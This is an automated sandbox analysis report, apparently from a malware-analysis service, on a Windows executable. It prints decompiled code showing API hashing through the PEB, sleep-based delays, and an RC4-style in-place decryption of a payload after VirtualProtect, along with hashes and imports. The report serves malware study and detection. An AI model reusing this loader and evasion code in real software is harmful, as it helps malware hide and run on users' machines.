WININET.dll	InternetQueryOptionA, InternetOpenA, HttpOpenRequestA, InternetSetOptionA, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpAddRequestHeadersA, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: 7FzERy9xWc.exe PID: 2788 Parent PID: 5724

General

Start time:	15:50:28
Start date:	11/04/2021
Path:	C:\Users\user\Desktop\7FzERy9xWc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\7FzERy9xWc.exe'
Imagebase:	0x400000
File size:	188928 bytes
MD5 hash:	8F250F634DE721FEC7B002A805DDDC24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 7FzERy9xWc.exe PID: 2788 Parent PID: 5724 7FzERy9xWc.exeCOMMON

Executed Functions

Function 00409D89, Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 235
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409D89(void* _a4, intOrPtr _a8, long _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t182;
				intOrPtr _t184;
				signed int _t202;
				void* _t203;
				signed int _t206;
				intOrPtr _t207;
				intOrPtr _t213;
				void* _t214;
				void* _t215;
				signed int _t219;
				intOrPtr _t224;
				signed int _t245;
				signed int _t249;
				intOrPtr _t254;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int* _t275;
				long _t276;
				intOrPtr* _t284;
				intOrPtr* _t286;
				signed int _t287;
				long _t288;
				signed int _t289;
				signed int _t292;
				signed int _t296;
				void* _t302;
				void* _t303;

				_t206 = 0;
				_v20 = 0;
				_v32 = 0x1218b;
				_v16 = 0x934;
				_push(0x55f6b799);
				_t286 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				asm("movd mm3, edi");
				do {
					_t224 =  *((intOrPtr*)(_t286 + 8));
					_t303 =  *((char*)(_t286 + 0x1c)) - 0x18;
					_t286 =  *_t286;
				} while (_t303 != 0);
				asm("movd mm4, edi");
				_t182 = _t224;
				_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x3c)) + _t182 + 0x78));
				_t214 = _t213 + _t182;
				_t287 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *((intOrPtr*)(_t213 + _t182 + 0x18)) == 0) {
					L14:
					_t215 = 0x288f2d;
					do {
						_t184 = _v32 + 1;
						_v16 = _v16 + _t184;
						_v32 = _t184;
						if(_t184 >= 0xa3) {
							_v16 = _v16 - 1;
						}
						_t215 = _t215 - 1;
					} while (_t215 != 0);
					_t288 = 0;
					do {
						 *(_t302 + _t288 * 4 - 0x41c) = _t288;
						if(_t288 <= 0x45) {
							Sleep(_t288); // executed
						}
						_t288 = _t288 + 1;
					} while (_t288 < 0x100);
					Sleep(0x20c); // executed
					VirtualProtect(_a4, _a12, 0x40,  &_v8);
					 *0x41ddad = 0xe481703c;
					 *0x0041DD34 = 0xfc0ca23d;
					_t207 = _a8;
					_t219 = 0;
					_t58 = _t219 + 2; // 0x2
					_t289 = _t58;
					do {
						_t270 = ( *(_t219 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x41c) + _v20 & 0x800000ff;
						if(_t270 < 0) {
							_t270 = (_t270 - 0x00000001 | 0xffffff00) + 1;
						}
						 *(_t302 + _t219 * 4 - 0x41c) =  *(_t302 + _t270 * 4 - 0x41c);
						 *(_t302 + _t270 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x41c) & 0x000000ff;
						_t82 = _t289 - 1; // 0x1
						_t272 = _t270 + ( *(_t82 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x418) & 0x800000ff;
						if(_t272 < 0) {
							_t272 = (_t272 - 0x00000001 | 0xffffff00) + 1;
						}
						 *(_t302 + _t219 * 4 - 0x418) =  *(_t302 + _t272 * 4 - 0x41c);
						 *(_t302 + _t272 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x418) & 0x000000ff;
						_t274 = _t272 + ( *(_t289 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x414) & 0x800000ff;
						if(_t274 < 0) {
							_t274 = (_t274 - 0x00000001 | 0xffffff00) + 1;
						}
						 *(_t302 + _t219 * 4 - 0x414) =  *(_t302 + _t274 * 4 - 0x41c);
						 *(_t302 + _t274 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x414) & 0x000000ff;
						_t127 = _t289 + 1; // 0x3
						_t245 = ( *(_t127 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x410) + _t274 & 0x800000ff;
						if(_t245 < 0) {
							_t245 = (_t245 - 0x00000001 | 0xffffff00) + 1;
						}
						_t275 = _t302 + _t245 * 4 - 0x41c;
						_v20 = _t245;
						 *(_t302 + _t219 * 4 - 0x410) =  *_t275;
						_t202 =  *(_t302 + _t219 * 4 - 0x410) & 0x000000ff;
						_t289 = _t289 + 4;
						_t219 = _t219 + 4;
						 *_t275 = _t202;
					} while (_t289 < 0x102);
					_t276 = _a12;
					_t203 = 0;
					if(_t276 == 0) {
						L44:
						return VirtualProtect(_a4, _t276, _v8,  &_v12);
					}
					do {
						if(_t203 < _a20 || _t203 > _a24) {
							_t219 = _t219 + 0x00000001 & 0x800000ff;
							if(_t219 < 0) {
								_t219 = (_t219 - 0x00000001 | 0xffffff00) + 1;
							}
							_t292 =  *(_t302 + _t219 * 4 - 0x41c) + _v20 & 0x800000ff;
							if(_t292 < 0) {
								_t292 = (_t292 - 0x00000001 | 0xffffff00) + 1;
							}
							_v20 = _t292;
							_t249 =  *(_t302 + _t219 * 4 - 0x41c) & 0x000000ff;
							 *(_t302 + _t219 * 4 - 0x41c) =  *(_t302 + _t292 * 4 - 0x41c);
							 *(_t302 + _t292 * 4 - 0x41c) = _t249;
							_t296 =  *(_t302 + _t219 * 4 - 0x41c) + _t249 & 0x800000ff;
							if(_t296 < 0) {
								_t296 = (_t296 - 0x00000001 | 0xffffff00) + 1;
							}
							 *(_t203 + _a4) =  *(_t203 + _a4) ^  *(_t302 + _t296 * 4 - 0x41c) & 0x000000ff;
						}
						_t203 = _t203 + 1;
					} while (_t203 < _t276);
					goto L44;
				}
				_t284 =  *((intOrPtr*)(_t214 + 0x20)) + _t182;
				do {
					if(_t284 == 0) {
						goto L13;
					}
					if(_v28 != 0) {
						L10:
						if(_t206 == 0 &&  *((intOrPtr*)(_t182 +  *_t284)) == 0x65656c53) {
							_t206 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x1c)) + ( *( *((intOrPtr*)(_t214 + 0x24)) + _t287 * 2 + _t182) & 0x0000ffff) * 4 + _t182)) + _t182;
							_v24 = _t206;
						}
						goto L13;
					}
					_t254 =  *_t284;
					if( *((intOrPtr*)(_t254 + _t182)) != 0x74726956 ||  *((intOrPtr*)(_t254 + _t182 + 4)) != 0x506c6175 ||  *((intOrPtr*)(_t254 + _t182 + 8)) != 0x65746f72) {
						goto L10;
					} else {
						_t206 = _v24;
						_v28 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x1c)) + ( *( *((intOrPtr*)(_t214 + 0x24)) + _t287 * 2 + _t182) & 0x0000ffff) * 4 + _t182)) + _t182;
					}
					L13:
					_t287 = _t287 + 1;
					_t284 = _t284 + 4;
				} while (_t287 <  *((intOrPtr*)(_t214 + 0x18)));
				goto L14;
			}

0x00409d94
0x00409d97
0x00409d9a
0x00409da1
0x00409da8
0x00409db7
0x00409dba
0x00409dbd
0x00409dbd
0x00409dc0
0x00409dc4
0x00409dc4
0x00409dcb
0x00409dce
0x00409dd3
0x00409ddb
0x00409ddd
0x00409ddf
0x00409de2
0x00409de7
0x00409e64
0x00409e64
0x00409e69
0x00409e6c
0x00409e6d
0x00409e70
0x00409e78
0x00409e7a
0x00409e7a
0x00409e7d
0x00409e7d
0x00409e80
0x00409e89
0x00409e89
0x00409e93
0x00409e96
0x00409e96
0x00409e98
0x00409e99
0x00409ea6
0x00409eb6
0x00409ec1
0x00409ec7
0x00409ece
0x00409ed1
0x00409ed3
0x00409ed3
0x00409ed6
0x00409eeb
0x00409ef1
0x00409efa
0x00409efa
0x00409f0c
0x00409f13
0x00409f1c
0x00409f2f
0x00409f35
0x00409f3e
0x00409f3e
0x00409f50
0x00409f57
0x00409f72
0x00409f78
0x00409f81
0x00409f81
0x00409f90
0x00409f9c
0x00409fa3
0x00409fb6
0x00409fbc
0x00409fc5
0x00409fc5
0x00409fcd
0x00409fd4
0x00409fd9
0x00409fe0
0x00409fe3
0x00409fe6
0x00409fe9
0x00409feb
0x00409ff7
0x00409ffa
0x00409ffe
0x0040a092
0x0040a0a8
0x0040a0a8
0x0040a009
0x0040a00c
0x0040a014
0x0040a01a
0x0040a023
0x0040a023
0x0040a02e
0x0040a034
0x0040a03d
0x0040a03d
0x0040a04c
0x0040a056
0x0040a059
0x0040a060
0x0040a06b
0x0040a071
0x0040a07a
0x0040a07a
0x0040a086
0x0040a086
0x0040a089
0x0040a08a
0x00000000
0x0040a009
0x00409dec
0x00409dee
0x00409df0
0x00000000
0x00000000
0x00409df6
0x00409e34
0x00409e36
0x00409e56
0x00409e58
0x00409e58
0x00000000
0x00409e36
0x00409df8
0x00409e01
0x00000000
0x00409e17
0x00409e2a
0x00409e2f
0x00409e2f
0x00409e5b
0x00409e5b
0x00409e5c
0x00409e5f
0x00000000

APIs

Sleep.KERNELBASE(00000000), ref: 00409E96
Sleep.KERNELBASE(0000020C), ref: 00409EA6
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00409EB6
VirtualProtect.KERNELBASE(?,?,FC0CA23D,?,?,?,?,?), ref: 0040A09F

Strings

4roteualP, xrefs: 00409ECE
ualP, xrefs: 00409E03
Virt, xrefs: 00409DFA
rote, xrefs: 00409E0D
Slee, xrefs: 00409E3A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectSleepVirtual
String ID: 4roteualP$Slee$Virt$rote$ualP
API String ID: 4088328274-2735038800
Opcode ID: d83611f036b68efe369b722386888c60b329ce7402a6378ad47c0ac1763d9921
Instruction ID: 04a1e5600cfa775f1d947e31be1fc21062162248b24dcc2dafc41bb955e9babf
Opcode Fuzzy Hash: d83611f036b68efe369b722386888c60b329ce7402a6378ad47c0ac1763d9921
Instruction Fuzzy Hash: E5A1B7B190011A8BCB10CF55D8806EAB7B1FF98308F29C57ACD59A7386D338AD528FD4

Uniqueness

Uniqueness Score: -1.00%

Function 00415510, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00415510(intOrPtr* __edi, struct _SECURITY_DESCRIPTOR* __esi) {
				char _v16;
				int _v20;
				int _v24;
				struct _ACL* _v28;
				void* _v32;
				void* _t15;
				void* _t16;
				intOrPtr* _t27;
				struct _SECURITY_DESCRIPTOR* _t28;

				_t28 = __esi;
				_t27 = __edi;
				if(InitializeSecurityDescriptor(__esi, 1) == 0 || SetSecurityDescriptorDacl(__esi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t15 =  &_v16;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t15, 0); // executed
					if(_t15 == 0) {
						L6:
						_t16 = _t15 | 0xffffffff;
						L8:
						if(_t27 == 0) {
							return _t16;
						} else {
							 *_t27 = 0xc;
							 *(_t27 + 4) = _t28;
							 *(_t27 + 8) = 0;
							return _t16;
						}
					}
					_v28 = 0;
					if(GetSecurityDescriptorSacl(_v32,  &_v20,  &_v28,  &_v24) == 0 || SetSecurityDescriptorSacl(__esi, _v20, _v28, _v24) == 0) {
						_t15 = LocalFree(_v32);
						goto L6;
					} else {
						_t16 = _v32;
						goto L8;
					}
				}
			}

0x00415510
0x00415510
0x0041551e
0x00000000
0x00415539
0x0041553b
0x00415547
0x0041554f
0x0041559b
0x0041559b
0x004155a3
0x004155a5
0x004155c0
0x004155a7
0x004155a7
0x004155ad
0x004155b0
0x004155ba
0x004155ba
0x004155a5
0x00415565
0x00415575
0x00415595
0x00000000
0x004155a0
0x004155a0
0x00000000
0x004155a0
0x00415575

APIs

InitializeSecurityDescriptor.ADVAPI32(0042E93C,00000001,?,0041CB8C,?,00000000), ref: 00415516
SetSecurityDescriptorDacl.ADVAPI32(0042E93C,00000001,00000000,00000000,?,0041CB8C,?,00000000), ref: 0041552B
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00415547
GetSecurityDescriptorSacl.ADVAPI32 ref: 0041556D
SetSecurityDescriptorSacl.ADVAPI32(0042E93C,?,?,?), ref: 00415587
LocalFree.KERNEL32 ref: 00415595

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00415542

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: f5ba2e801825e1a54cea10cf959499a00a1d5144bdb0018afe9a2e3c59ca4b86
Instruction ID: fc2951b30ceb4b2013b7860237aee02788832248db0c92337de632304ae91493
Opcode Fuzzy Hash: f5ba2e801825e1a54cea10cf959499a00a1d5144bdb0018afe9a2e3c59ca4b86
Instruction Fuzzy Hash: 72116074215601FBE7109F14CD44FE777AAABC4B00F40891DF599D62D0E7B8D984876A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAF0, Relevance: 9.1, APIs: 6, Instructions: 105
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041CAF0(void* __ecx, void* __edx, void* __edi, signed int _a4) {
				char _v404;
				void* __esi;
				signed int _t10;
				signed int _t13;
				signed int _t15;
				signed int _t16;
				signed int _t18;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				void* _t24;
				void* _t30;
				void* _t36;
				signed int _t39;

				_t36 = __edi;
				_t30 = __ecx;
				_t8 = _a4;
				_t39 = _a4 & 0x00000001;
				if(_t39 == 0) {
					 *0x42e8f8 = 0;
				}
				if(E0041C530(_t8) != 0) {
					_t10 = HeapCreate(0, 0x80000, 0); // executed
					 *0x42e6d4 = _t10;
					__eflags = _t10;
					if(_t10 != 0) {
						 *0x42d48b = 1;
					} else {
						 *0x42e6d4 = GetProcessHeap();
						 *0x42d48b = 0;
					}
					 *0x42dd08 = 0;
					 *0x42d48a = 0;
					InitializeCriticalSection(0x42e6e8);
					 *0x42e700 = 0; // executed
					__imp__#115(0x202,  &_v404); // executed
					_t13 = E0041C670(_a4, _t36, _t39);
					__eflags = _t13;
					if(_t13 == 0) {
						goto L3;
					} else {
						__eflags = _t39;
						if(__eflags != 0) {
							L10:
							_t15 = E0041C730(_t30, _t36, _t39, __eflags);
							__eflags = _t15;
							if(_t15 == 0) {
								goto L3;
							} else {
								_t16 = E0041C780(_t15, _a4);
								__eflags = _t16;
								if(_t16 == 0) {
									goto L3;
								} else {
									 *0x42eb68 = GetCurrentProcessId();
									 *0x42eb6c = 0;
									__eflags = _t39;
									if(_t39 != 0) {
										L16:
										_push(_a4);
										_t18 = E0041C8E0();
										__eflags = _t18;
										if(_t18 == 0) {
											goto L3;
										} else {
											__eflags = _a4 & 0x00000002;
											 *0x42e6e4 = 0;
											 *0x42d4f8 = 0;
											 *0x42ee18 = 0;
											 *0x42d490 = 0;
											 *0x42d428 = 0;
											 *0x42e788 = 0;
											 *0x42e720 = 0;
											if((_a4 & 0x00000002) == 0) {
												L19:
												return 1;
											} else {
												_t21 = E0041C9D0();
												__eflags = _t21;
												if(_t21 == 0) {
													goto L3;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t22 = E0041C840();
										__eflags = _t22;
										if(_t22 == 0) {
											goto L3;
										} else {
											__eflags = _t39;
											if(_t39 != 0) {
												goto L16;
											} else {
												_t23 = E0041C8A0();
												__eflags = _t23;
												if(_t23 == 0) {
													goto L3;
												} else {
													goto L16;
												}
											}
										}
									}
								}
							}
						} else {
							_t24 = CreateEventW(0x42e930, 1, 0, 0);
							 *0x42edbc = _t24;
							 *0x42edc0 = 0xffffffff;
							__eflags = _t24;
							if(__eflags == 0) {
								goto L3;
							} else {
								goto L10;
							}
						}
					}
				} else {
					L3:
					return 0;
				}
			}

0x0041caf0
0x0041caf0
0x0041caf6
0x0041cb03
0x0041cb0b
0x0041cb0d
0x0041cb0d
0x0041cb1b
0x0041cb2e
0x0041cb34
0x0041cb39
0x0041cb3b
0x0041cb50
0x0041cb3d
0x0041cb43
0x0041cb48
0x0041cb48
0x0041cb5c
0x0041cb62
0x0041cb68
0x0041cb78
0x0041cb7e
0x0041cb87
0x0041cb8c
0x0041cb8e
0x00000000
0x0041cb90
0x0041cb90
0x0041cb92
0x0041cbba
0x0041cbba
0x0041cbbf
0x0041cbc1
0x00000000
0x0041cbc7
0x0041cbcb
0x0041cbd0
0x0041cbd2
0x00000000
0x0041cbd8
0x0041cbde
0x0041cbe3
0x0041cbe9
0x0041cbeb
0x0041cc0b
0x0041cc0e
0x0041cc0f
0x0041cc14
0x0041cc16
0x00000000
0x0041cc1c
0x0041cc22
0x0041cc26
0x0041cc2c
0x0041cc32
0x0041cc39
0x0041cc40
0x0041cc46
0x0041cc4d
0x0041cc54
0x0041cc63
0x0041cc6a
0x0041cc56
0x0041cc56
0x0041cc5b
0x0041cc5d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cc5d
0x0041cc54
0x0041cbed
0x0041cbed
0x0041cbf2
0x0041cbf4
0x00000000
0x0041cbfa
0x0041cbfa
0x0041cbfc
0x00000000
0x0041cbfe
0x0041cbfe
0x0041cc03
0x0041cc05
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cc05
0x0041cbfc
0x0041cbf4
0x0041cbeb
0x0041cbd2
0x0041cb94
0x0041cb9d
0x0041cba3
0x0041cba8
0x0041cbb2
0x0041cbb4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cbb4
0x0041cb92
0x0041cb1d
0x0041cb1d
0x0041cb24
0x0041cb24

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 0041CB2E
GetProcessHeap.KERNEL32(?,00000000), ref: 0041CB3D
InitializeCriticalSection.KERNEL32(0042E6E8,?,00000000), ref: 0041CB68
WSAStartup.WS2_32(00000202,?), ref: 0041CB7E
CreateEventW.KERNEL32(0042E930,00000001,00000000,00000000,?,00000000), ref: 0041CB9D
GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 0041CBD8

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapProcess$CriticalCurrentEventInitializeSectionStartup
String ID:
API String ID: 3930056065-0
Opcode ID: a8e31060e178ac4c2593aecad6c8bec67f9f5d957ed8b9859a85983697928152
Instruction ID: 94ed06b3fbce81b2969c167204fe336d9944c2f3f045b6f968cfe4c9bd247dfc
Opcode Fuzzy Hash: a8e31060e178ac4c2593aecad6c8bec67f9f5d957ed8b9859a85983697928152
Instruction Fuzzy Hash: 053104B1B942449ACB30FF35BCC66D63754AB15384B80013FE954D73A1E77968C28B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00416D20, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00416D20() {
				intOrPtr _v16;
				intOrPtr _v28;
				char _v520;
				short _v540;
				short _v552;
				short _v656;
				char _v732;
				char _v740;
				char _v752;
				char* _t15;
				void* _t21;
				void* _t28;
				intOrPtr* _t38;

				_t15 =  &_v520;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t15); // executed
				if(_t15 != 0) {
					L8:
					E00410870(_v16, _v16, 0, 0x10);
					return 0;
				} else {
					PathAddBackslashW( &_v540);
					_t38 = __imp__GetVolumeNameForVolumeMountPointW;
					_t21 =  *_t38( &_v540,  &_v740, 0x64); // executed
					if(_t21 != 0) {
						L5:
						if(_v732 != 0x7b) {
							goto L8;
						} else {
							_v656 = 0;
							__imp__CLSIDFromString( &_v732, _v28);
							if(0 != 0) {
								goto L8;
							} else {
								return 0;
							}
						}
					} else {
						while(1) {
							PathRemoveBackslashW( &_v552);
							if(PathRemoveFileSpecW( &_v552) == 0) {
								goto L8;
							}
							PathAddBackslashW( &_v552);
							_t28 =  *_t38( &_v552,  &_v752, 0x64); // executed
							if(_t28 == 0) {
								continue;
							} else {
								goto L5;
							}
							goto L9;
						}
						goto L8;
					}
				}
				L9:
			}

0x00416d2a
0x00416d3a
0x00416d42
0x00416dec
0x00416df8
0x00416e09
0x00416d48
0x00416d56
0x00416d58
0x00416d6d
0x00416d71
0x00416db7
0x00416dbd
0x00000000
0x00416dbf
0x00416dce
0x00416dd3
0x00416ddb
0x00000000
0x00416de0
0x00416de9
0x00416de9
0x00416ddb
0x00416d73
0x00416d80
0x00416d88
0x00416d96
0x00000000
0x00000000
0x00416da0
0x00416db1
0x00416db5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00416db5
0x00000000
0x00416d80
0x00416d71
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,?,00000000), ref: 00416D3A
PathAddBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D56
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,00000064,00000064,?,00000000,?,00000000), ref: 00416D6D
PathRemoveBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D88
PathRemoveFileSpecW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D92
PathAddBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416DA0
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,00000064,00000064,?,00000000,?,00000000), ref: 00416DB1
CLSIDFromString.OLE32(?,?), ref: 00416DD3

Strings

{, xrefs: 00416DB7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Volume$Backslash$MountNamePointRemove$FileFolderFromSpecString
String ID: {
API String ID: 533550053-366298937
Opcode ID: 81651ece8f0824eb6db95760027964cdd39881c34e909f3106671e4a471655c4
Instruction ID: 70b75c34f6867e1d353f79dcc71a002376c79a05a8f0dad77b9e9410b1e1dcb9
Opcode Fuzzy Hash: 81651ece8f0824eb6db95760027964cdd39881c34e909f3106671e4a471655c4
Instruction Fuzzy Hash: 4521957624434166D730DBA1EC84FDB73ECAB88750F00492FF644A7190E675E988CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD30, Relevance: 9.1, APIs: 6, Instructions: 79
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(void* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v4;
				char _v8;
				char _v12;
				char _v13;
				char _v16;
				char _v20;
				char _v21;
				void* _t22;
				void* _t26;
				char _t28;
				char _t32;
				short* _t36;
				void* _t38;
				signed int _t42;
				intOrPtr _t45;

				_t32 = 0; // executed
				_t22 = E0041CAF0(__ecx, __edx, __edi, 0); // executed
				if(_t22 == 0) {
					L21:
					__eflags = _t32;
					_t21 = _t32 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v8 = 0;
				_v12 = 1;
				_v13 = 0;
				SetErrorMode(0x8007);
				_t26 = CommandLineToArgvW(GetCommandLineW(),  &_v4);
				if(_t26 == 0) {
					L16:
					_t28 = E0041D940(__eflags, _v16, _v20);
					goto L17;
				} else {
					_t45 = _v12;
					_t42 = 0;
					if(_t45 > 0) {
						do {
							_t36 =  *((intOrPtr*)(_t26 + _t42 * 4));
							if(_t36 != 0 &&  *_t36 == 0x2d) {
								_t38 = ( *(_t36 + 2) & 0x0000ffff) + 0xffffff9a;
								if(_t38 <= 0x10) {
									switch( *((intOrPtr*)(( *(_t38 + E0041DE40) & 0x000000ff) * 4 +  &M0041DE2C))) {
										case 0:
											_v16 = 1;
											goto L11;
										case 1:
											_t32 = 1;
											goto L11;
										case 2:
											_v20 = 0;
											goto L11;
										case 3:
											_v21 = 1;
											goto L11;
										case 4:
											goto L11;
									}
								}
							}
							L11:
							_t42 = _t42 + 1;
						} while (_t42 < _t45);
					}
					LocalFree(_t26);
					_t55 = _t32;
					if(_t32 == 0) {
						__eflags = _v21;
						if(__eflags == 0) {
							goto L16;
						} else {
							E004266C0();
							_t32 = E0041C040();
							_t28 = E00426790();
						}
					} else {
						_t28 = E0041D6F0(_t55);
						L17:
						_t32 = _t28;
					}
				}
				if(_t32 == 0 || ( *0x42e8f8 & 0x00000002) == 0) {
					goto L21;
				}
				Sleep(0xffffffff);
				return _t28;
			}

0x0041dd36
0x0041dd38
0x0041dd3f
0x0041de1d
0x0041de1f
0x0041de21
0x0041de21
0x0041de25
0x0041de25
0x0041dd4a
0x0041dd4e
0x0041dd53
0x0041dd57
0x0041dd69
0x0041dd71
0x0041ddf2
0x0041ddfc
0x00000000
0x0041dd77
0x0041dd78
0x0041dd7c
0x0041dd80
0x0041dd82
0x0041dd82
0x0041dd87
0x0041dd93
0x0041dd99
0x0041dda2
0x00000000
0x0041ddb4
0x00000000
0x00000000
0x0041dda9
0x00000000
0x00000000
0x0041ddad
0x00000000
0x00000000
0x0041ddbb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041dda2
0x0041dd99
0x0041ddc0
0x0041ddc0
0x0041ddc1
0x0041dd82
0x0041ddc6
0x0041ddcd
0x0041ddcf
0x0041ddd8
0x0041dddd
0x00000000
0x0041dddf
0x0041dddf
0x0041dde9
0x0041ddeb
0x0041ddeb
0x0041ddd1
0x0041ddd1
0x0041de01
0x0041de01
0x0041de01
0x0041ddcf
0x0041de05
0x00000000
0x00000000
0x0041de12
0x0041de1c

APIs

SetErrorMode.KERNEL32 ref: 0041DD57
GetCommandLineW.KERNEL32(?), ref: 0041DD62
CommandLineToArgvW.SHELL32(00000000), ref: 0041DD69
LocalFree.KERNEL32(00000000), ref: 0041DDC6
Sleep.KERNEL32(000000FF,00000001,00000000), ref: 0041DE12
ExitProcess.KERNEL32 ref: 0041DE25

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandLine$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 3718487608-0
Opcode ID: 8c182f0e78debcfcb910ec5c01f5569e7b68220ba176df76f4367427a46a1214
Instruction ID: 4c7482349d1bab18395e1777bbb6e7bca6f38983f1649904a7398465943e1ee4
Opcode Fuzzy Hash: 8c182f0e78debcfcb910ec5c01f5569e7b68220ba176df76f4367427a46a1214
Instruction Fuzzy Hash: 95212CB0D493A19AD7146B3898147EB3B80AF52319F08885FF4915B292CB7E84C5875B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041E910, Relevance: 84.4, APIs: 28, Strings: 20, Instructions: 425
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041E910() {
				_Unknown_base(*)()* _t160;
				struct HINSTANCE__* _t161;
				struct HINSTANCE__* _t166;
				_Unknown_base(*)()* _t167;
				struct HICON__* _t184;
				struct HINSTANCE__* _t230;
				struct HINSTANCE__* _t269;
				intOrPtr* _t272;
				intOrPtr* _t279;
				_Unknown_base(*)()* _t280;
				void* _t287;

				VirtualProtect(E00409C70, 0x5dc, 4, _t287 + 0xa0);
				_t230 = 0;
				 *((intOrPtr*)(_t287 + 0x24)) = 0;
				 *((intOrPtr*)(_t287 + 0x58)) = 0;
